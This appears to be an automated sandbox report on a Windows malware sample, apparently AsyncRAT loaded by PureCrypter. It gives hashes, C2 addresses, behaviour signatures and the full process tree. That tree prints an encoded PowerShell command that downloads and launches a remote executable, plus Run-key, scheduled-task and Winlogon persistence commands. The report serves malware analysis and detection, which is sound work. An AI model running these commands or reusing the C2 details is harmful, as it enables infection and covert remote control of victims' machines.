Analysis
-
max time kernel
114s -
max time network
112s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
15-06-2024 10:59
Static task
static1
Behavioral task
behavioral1
Sample
0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral2
Sample
0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe
Resource
win11-20240508-en
General
-
Target
0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe
-
Size
501KB
-
MD5
8b662719e44ab11419fe3e1d7e96cc03
-
SHA1
af6c092ff304cd5131cc0295fa8b51a572af5388
-
SHA256
0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68
-
SHA512
3a441802fad9b3eafe327d6239cb8891551df04ccf555658d8855fbbcdacda3abefc9e627b3a59cf28de9681e348d2cc749cd63514721c9b86e0519ceb57309a
-
SSDEEP
12288:iSrH22qla5w/yXbxixFcRMFQIkeNCSo9mbX:iSrH0MW/IbxiYCQIkeNCSB
Malware Config
Extracted
asyncrat
0.5.7B
217.64.31.3:8808
217.64.31.3:8437
Windows System Guard Runtime
-
delay
3
-
install
false
-
install_file
Windows Session Manager
-
install_folder
%AppData%
Signatures
-
Detect PureCrypter injector 1 IoCs
Processes:
resource yara_rule behavioral1/memory/60-6-0x0000000006730000-0x00000000067A4000-memory.dmp family_purecrypter -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Ltntuhk\\Zmluvhyw.exe\"," 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe -
PureCrypter
PureCrypter is a .NET malware loader first seen in early 2021.
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exeBbxodsfpqzzzzzzzzzzzzzzzz.exeSOFTINCA CRYPT.EXEdescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation Bbxodsfpqzzzzzzzzzzzzzzzz.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation SOFTINCA CRYPT.EXE -
Executes dropped EXE 3 IoCs
Processes:
Bbxodsfpqzzzzzzzzzzzzzzzz.exeSOFTINCA CRYPT.EXEV_PROTECTED.EXEpid process 4296 Bbxodsfpqzzzzzzzzzzzzzzzz.exe 1800 SOFTINCA CRYPT.EXE 4976 V_PROTECTED.EXE -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurtyService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurtyService\\SecurtyService.exe" powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
V_PROTECTED.EXE0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exedescription pid process target process PID 4976 set thread context of 1700 4976 V_PROTECTED.EXE RegAsm.exe PID 60 set thread context of 4840 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe InstallUtil.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A Taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName Taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 Taskmgr.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 5096 timeout.exe 1892 timeout.exe -
Suspicious behavior: EnumeratesProcesses 39 IoCs
Processes:
powershell.exepowershell.exe0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exeTaskmgr.exepid process 3720 powershell.exe 3720 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 3720 powershell.exe 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exepowershell.exepowershell.exeTaskmgr.exedescription pid process Token: SeDebugPrivilege 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe Token: SeDebugPrivilege 3720 powershell.exe Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 1528 Taskmgr.exe Token: SeSystemProfilePrivilege 1528 Taskmgr.exe Token: SeCreateGlobalPrivilege 1528 Taskmgr.exe -
Suspicious use of FindShellTrayWindow 41 IoCs
Processes:
Taskmgr.exepid process 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe -
Suspicious use of SendNotifyMessage 41 IoCs
Processes:
Taskmgr.exepid process 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe 1528 Taskmgr.exe -
Suspicious use of WriteProcessMemory 47 IoCs
Processes:
0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.execmd.execmd.exeBbxodsfpqzzzzzzzzzzzzzzzz.exeV_PROTECTED.EXESOFTINCA CRYPT.EXEcmd.exedescription pid process target process PID 60 wrote to memory of 4380 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe cmd.exe PID 60 wrote to memory of 4380 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe cmd.exe PID 60 wrote to memory of 4380 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe cmd.exe PID 4380 wrote to memory of 5096 4380 cmd.exe timeout.exe PID 4380 wrote to memory of 5096 4380 cmd.exe timeout.exe PID 4380 wrote to memory of 5096 4380 cmd.exe timeout.exe PID 60 wrote to memory of 1528 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe cmd.exe PID 60 wrote to memory of 1528 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe cmd.exe PID 60 wrote to memory of 1528 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe cmd.exe PID 1528 wrote to memory of 1892 1528 cmd.exe timeout.exe PID 1528 wrote to memory of 1892 1528 cmd.exe timeout.exe PID 1528 wrote to memory of 1892 1528 cmd.exe timeout.exe PID 60 wrote to memory of 4296 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe Bbxodsfpqzzzzzzzzzzzzzzzz.exe PID 60 wrote to memory of 4296 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe Bbxodsfpqzzzzzzzzzzzzzzzz.exe PID 60 wrote to memory of 4296 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe Bbxodsfpqzzzzzzzzzzzzzzzz.exe PID 4296 wrote to memory of 1800 4296 Bbxodsfpqzzzzzzzzzzzzzzzz.exe SOFTINCA CRYPT.EXE PID 4296 wrote to memory of 1800 4296 Bbxodsfpqzzzzzzzzzzzzzzzz.exe SOFTINCA CRYPT.EXE PID 4296 wrote to memory of 4976 4296 Bbxodsfpqzzzzzzzzzzzzzzzz.exe V_PROTECTED.EXE PID 4296 wrote to memory of 4976 4296 Bbxodsfpqzzzzzzzzzzzzzzzz.exe V_PROTECTED.EXE PID 4296 wrote to memory of 4976 4296 Bbxodsfpqzzzzzzzzzzzzzzzz.exe V_PROTECTED.EXE PID 4976 wrote to memory of 3720 4976 V_PROTECTED.EXE powershell.exe PID 4976 wrote to memory of 3720 4976 V_PROTECTED.EXE powershell.exe PID 4976 wrote to memory of 3720 4976 V_PROTECTED.EXE powershell.exe PID 4976 wrote to memory of 3384 4976 V_PROTECTED.EXE cmd.exe PID 4976 wrote to memory of 3384 4976 V_PROTECTED.EXE cmd.exe PID 4976 wrote to memory of 3384 4976 V_PROTECTED.EXE cmd.exe PID 1800 wrote to memory of 1328 1800 SOFTINCA CRYPT.EXE powershell.exe PID 1800 wrote to memory of 1328 1800 SOFTINCA CRYPT.EXE powershell.exe PID 4976 wrote to memory of 1700 4976 V_PROTECTED.EXE RegAsm.exe PID 4976 wrote to memory of 1700 4976 V_PROTECTED.EXE RegAsm.exe PID 4976 wrote to memory of 1700 4976 V_PROTECTED.EXE RegAsm.exe PID 4976 wrote to memory of 1700 4976 V_PROTECTED.EXE RegAsm.exe PID 4976 wrote to memory of 1700 4976 V_PROTECTED.EXE RegAsm.exe PID 4976 wrote to memory of 1700 4976 V_PROTECTED.EXE RegAsm.exe PID 4976 wrote to memory of 1700 4976 V_PROTECTED.EXE RegAsm.exe PID 4976 wrote to memory of 1700 4976 V_PROTECTED.EXE RegAsm.exe PID 3384 wrote to memory of 4480 3384 cmd.exe schtasks.exe PID 3384 wrote to memory of 4480 3384 cmd.exe schtasks.exe PID 3384 wrote to memory of 4480 3384 cmd.exe schtasks.exe PID 60 wrote to memory of 4840 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe InstallUtil.exe PID 60 wrote to memory of 4840 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe InstallUtil.exe PID 60 wrote to memory of 4840 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe InstallUtil.exe PID 60 wrote to memory of 4840 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe InstallUtil.exe PID 60 wrote to memory of 4840 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe InstallUtil.exe PID 60 wrote to memory of 4840 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe InstallUtil.exe PID 60 wrote to memory of 4840 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe InstallUtil.exe PID 60 wrote to memory of 4840 60 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe InstallUtil.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe"C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe"1⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:60 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /nobreak /t 202⤵
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\SysWOW64\timeout.exetimeout /nobreak /t 203⤵
- Delays execution with timeout.exe
PID:5096
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 402⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\SysWOW64\timeout.exetimeout 403⤵
- Delays execution with timeout.exe
PID:1892
-
-
-
C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe"C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4296 -
C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE"C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcQBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AZgBpAGwAZQBiAGkAbgAyAC4AYQB3AHMALgBhAHQAcwBpAGcAbgAuAGMAbABvAHUAZAAvADkAMwBpADMAbwBuADEAZAAzAGYAdABhADgAaQBqAGgALwBkAGMAXwBjAHIAeQBwAHQALgBlAHgAZQAnACwAIAA8ACMAYgBxAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAHkAcgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAG4AeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkAbgBkAG8AdwBzAFMAZQBjAHUAcgB0AHkALgBlAHgAZQAnACkAKQA8ACMAaABjAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeABuAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHcAaABqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFcAaQBuAGQAbwB3AHMAUwBlAGMAdQByAHQAeQAuAGUAeABlACcAKQA8ACMAaQBhAGsAIwA+AA=="4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1328
-
-
-
C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE"C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService' -Value '"C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe"' -PropertyType 'String'4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3720
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C schtasks /create /tn \SecurtyService /tr "C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f4⤵
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \SecurtyService /tr "C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f5⤵
- Creates scheduled task(s)
PID:4480
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd4⤵PID:1700
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe2⤵PID:4840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3768,i,14486271492189381216,15799931579469722648,262144 --variations-seed-version --mojo-platform-channel-handle=4552 /prefetch:81⤵PID:4872
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3616
-
C:\Windows\System32\Taskmgr.exe"C:\Windows\System32\Taskmgr.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1528
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d49246229b2077d7961ee5c90e0945f8
SHA18b50bbdbc82b00f545510bc3ea9e8cd96182fa79
SHA256581ef2752ddb123bff535eebcf573a4783ada1f4b7f7250c4145902a2de5dd8c
SHA5125069555ffc7a217c703186559ed399e5fd8e787443be1d6bf9b6b96faca2565fb1c898422bdde51aadd6359ebf65ae40d4509b2829c5f6bb64d597b3b4763148
-
Filesize
146KB
MD51a9c46f2b4420d156a82f160facf9376
SHA1ce91faa7353cb4d3411b20a69350f27a6fe47990
SHA25604d9e48a22db735eb74df9d53acd9bf6330cc4842b0e136767ac5ea1695250fd
SHA51214cc02a0bf3822888f69743ae946018eeb3c0bbced4e9f9edabf6b9a44013ecb708585f5ca3145add251bf1053c67f38e5f9d7abfe9d822e38f59b3188a62685
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5a0c1d68c150049944598f3927176a4b9
SHA1bb27c0d5385e8cb803fe63b958b95d6f78f7c8e1
SHA256fb79b16cda58da4af5d374a6b1a9897e880ec01d97122902b35cc94933fc8908
SHA512c503525cf9e3c1704da899ef1162094819287c82a52c953a9df4340335ce9edbabef6b4cc91d12a34ac69e9fa4b1bafa82aceece849aa2a12051f89714e3cc53
-
Filesize
87KB
MD581230dd9258eebd0fe6a2cc681c43c51
SHA1d6870e6014503e79589435d3b167f1c6e405721b
SHA2569d0e865de1feea37767b57b0b7c68ce143b72b071e0201af051e02d64c33ead1
SHA5122c11be14d9f6a6d5011dfcf67b7115e3ad04e267eb7ced0b9fd7f9e286f87e553b9fae6f1a3a9a491d5ff7e96ac01a108fd52097ae6b3a44e7ca68315b70d96a